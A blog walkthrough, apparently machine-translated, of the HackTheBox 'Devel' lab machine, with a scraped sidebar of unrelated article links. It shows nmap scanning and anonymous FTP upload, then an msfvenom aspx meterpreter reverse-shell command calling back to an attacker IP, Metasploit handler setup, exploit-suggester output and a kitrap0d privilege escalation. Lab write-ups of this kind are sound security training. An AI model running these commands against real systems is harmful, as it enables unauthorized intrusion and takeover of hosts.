当前位置:网站首页>HTB-Devel
HTB-Devel
2022-07-03 02:35:00 【H0ne】
Devel
First step : Scan the network
nmap -sV -O -F --version-light 10.10.10.5
port 21: File transfer protocol FTP Control command , It's a Microsoft ftpd
port 80: Hypertext transfer protocol (HTTP), This is a iis The server
The second step : attack FTP
Check ftp
ftp 10.10.10.5
Yes, you can log in anonymously 
Attempt to write to file
put flag.html
echo “H0ne” > flag.html
ls -a You can see the file
Browser access 10.10.10.5/flag.html You can see H0ne Of
The third step : establish / Upload .aspx Shell
Use MSFvenom Exploit vulnerabilities
MSFvenom Is a payload generator ,
We need to create a reverse shell, This is a way for the target machine to communicate with the attacking machine shell, The attacking machine has a listening port , It receives connections , By using code or command execution 
reverse tcp The enclosure should be suitable for windows, We will use meterpreter
Meterpreter It's an advanced 、 Dynamically scalable payloads , It uses in memory DLL Injection phase , And expand through the network at runtime . It passes through stager Socket to communicate and provide a comprehensive client Ruby API. It has command history 、 Tab complete 、 Channel and other functions .
asp Meterpreter reverse TCP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.15 LPORT=8080 -f aspx -o shell.aspx
-p : Payload used
-f: Output format
-o: Save the payload to a file
LHOST: Local host
LPORT: Local port
Reconnect the FTP
put Upload local file 
Step four : Set up the reverse shell Connect
Use metasploit
msfconsole start-up
search windows/meterpreter/reverse_tcp
use exploit/multi/handler
Use this command to set the payload handler
show options
Set up payload
set payload windows/meterpreter/reverse_tcp
Set up LHOST LPORT
It's all set up , then run
sysinfo View configuration information 
Insufficient permission to access the file , This requires raising the right
Step five : Elevated privileges
background Back before the attack
Look for vulnerabilities on the server
use post/multi/recon/local_exploit_suggester
meterpreter > background
[*] Backgrounding session 2...
msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set session 2
session => 2
msf5 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 29 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
exploit ms10_015_kitrap0d,
This is a local right exploit.
use exploit/windows/local/ms10_015_kitrap0d
Before I quit , use sessions -i Check my progress These are not over 

The last is to find flag 了 No demonstration
边栏推荐
猜你喜欢

内存池(内核角度理解new开辟空间的过程)

Principle and application of database

Thread safe singleton mode
![[Flutter] dart: class; abstract class; factory; Class, abstract class, factory constructor](/img/06/ab333a4752de27eae2dd937cf579e2.png)
[Flutter] dart: class; abstract class; factory; Class, abstract class, factory constructor

Error invalid bound statement (not found): com ruoyi. stock. mapper. StockDetailMapper. XXXX solution

The use of Flink CDC mongodb and the implementation of Flink SQL parsing complex nested JSON data in monggo

Tongda OA V12 process center

MATLAB小技巧(24)RBF,GRNN,PNN-神经网络

Random Shuffle attention

random shuffle注意
随机推荐
4. Classes and objects
Gbase 8C function / stored procedure definition
Classes and objects - initialization and cleanup of objects - constructor call rules
Cancellation of collaboration in kotlin, side effects of cancellation and overtime tasks
Gbase 8C system table PG_ am
[Flutter] dart: class;abstract class;factory;类、抽象类、工厂构造函数
My creation anniversary
面试项目技术栈总结
Gbase 8C function / stored procedure parameters (II)
MATLAB小技巧(24)RBF,GRNN,PNN-神经网络
Interview stereotyped version
GBase 8c 函数/存储过程参数(一)
Producer consumer model based on thread pool (including blocking queue)
Tongda OA V12 process center
Gbase 8C system table PG_ attribute
5.文件操作
Unrecognized SSL message, plaintext connection?
Awk from entry to burial (1) awk first meeting
GBase 8c系统表pg_cast
random shuffle注意